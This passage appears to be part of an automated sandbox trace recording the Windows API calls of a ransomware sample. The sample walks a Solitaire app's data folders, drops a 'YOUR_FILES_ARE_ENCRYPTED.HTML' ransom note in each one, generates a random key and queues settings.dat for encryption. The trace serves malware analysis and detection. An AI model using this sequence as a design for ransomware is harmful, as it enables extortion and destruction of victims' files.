(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\microsoft.microsoftsolitairecollection_3.3.9211.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.517] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.518] CloseHandle (hObject=0x32c) returned 1 [0116.518] GetProcessHeap () returned 0x600000 [0116.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.518] GetProcessHeap () returned 0x600000 [0116.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.520] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.520] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.520] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState") returned 114 [0116.520] GetProcessHeap () returned 0x600000 [0116.520] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.521] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState" [0116.521] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState\\*" [0116.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.521] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.521] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.521] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.521] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0116.521] GetProcessHeap () returned 0x600000 [0116.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.522] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.523] CloseHandle (hObject=0x32c) returned 1 [0116.523] GetProcessHeap () returned 0x600000 [0116.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.523] GetProcessHeap () returned 0x600000 [0116.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.523] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.523] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.523] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings") returned 110 [0116.524] GetProcessHeap () returned 0x600000 [0116.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.524] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings" [0116.524] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\*" [0116.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.525] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.525] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x680fbb04, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x680fbb04, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.525] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.525] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 123 [0116.525] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.525] lstrlenW (lpString=".lock") returned 5 [0116.525] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.525] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.525] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.525] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat") returned 123 [0116.525] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.525] lstrlenW (lpString=".dat") returned 4 [0116.525] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.525] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0116.525] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.526] GetProcessHeap () returned 0x600000 [0116.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.529] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D6") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CD") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E1") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="51") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="35") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0A") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="16") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="7D") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CC") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D1") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="2C") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="53") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FE") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F3") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="03") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C2") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="5A") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="15") returned 2 [0116.529] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="48") returned 2 [0116.530] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="50") returned 2 [0116.530] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="48") returned 2 [0116.530] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9A") returned 2 [0116.530] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="5B") returned 2 [0116.530] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A9") returned 2 [0116.530] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="9B") returned 2 [0116.530] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="07") returned 2 [0116.530] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6A") returned 2 [0116.530] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="FD") returned 2 [0116.530] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AF") returned 2 [0116.530] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="EA") returned 2 [0116.530] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B8") returned 2 [0116.530] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="57") returned 2 [0116.531] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.531] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.531] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.531] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0116.531] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.531] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.531] GetProcessHeap () returned 0x600000 [0116.531] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.532] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.534] CloseHandle (hObject=0x32c) returned 1 [0116.534] GetProcessHeap () returned 0x600000 [0116.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.534] GetProcessHeap () returned 0x600000 [0116.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.534] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.534] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData") returned 115 [0116.534] GetProcessHeap () returned 0x600000 [0116.534] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.534] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData" [0116.534] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData\\*" [0116.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.534] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.534] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.534] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.535] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0116.535] GetProcessHeap () returned 0x600000 [0116.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.536] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.537] CloseHandle (hObject=0x32c) returned 1 [0116.537] GetProcessHeap () returned 0x600000 [0116.537] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.537] GetProcessHeap () returned 0x600000 [0116.537] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.537] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.537] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.537] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState") returned 111 [0116.537] GetProcessHeap () returned 0x600000 [0116.537] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.538] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState" [0116.538] lstrcatW (in: 